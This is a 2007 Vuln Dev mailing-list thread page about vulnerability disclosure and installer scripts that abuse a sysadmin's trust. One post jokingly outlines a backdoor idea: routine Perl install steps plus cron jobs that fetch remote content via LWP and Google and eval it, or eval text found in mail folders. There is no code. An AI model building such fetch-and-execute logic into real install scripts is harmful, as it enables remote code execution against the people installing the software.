Vuln Dev
Re: Vulnerability Disclosure Jun 07 2007 12:21PM
Jonathan Leffler (jleffler us ibm com) (1 replies)
Re: Vulnerability Disclosure Jun 08 2007 05:10PM
Valdis Kletnieks vt edu (2 replies)
Re: Vulnerability Disclosure Jun 16 2007 07:36PM
Lincoln Yeoh (lyeoh pop jaring my)
At 01:10 AM 6/9/2007, Valdis.Kletnieks (at) vt (dot) edu [email concealed] wrote:

>The *real* attack vector here is "Can you, as an outsider, get the sysadmin
>to run a installer script that *looks* OK at first glance, but ends up
>doing something untoward by abusing the setup.exe that the sysadmin sees
>in the script but doesn't actually look closely at"?

Sure.

Install notes:

perl Makefile.PL
make
make test
make install

If you look at the Windows malware - a lot of attackers don't even
care about getting "admin", just normal user privileges are good
enough to do what they want (zombies to send spam, DoS, etc).

cron jobs + LWP + Google + eval = fun, right?

Could always look in ~/Maildir etc for "Spam" to eval too.

Have a nice day ;).

Link.

[ reply ]
Re: Vulnerability Disclosure Jun 08 2007 05:33PM
Jonathan Leffler (jleffler us ibm com)


 

Privacy Statement
Copyright 2010, SecurityFocus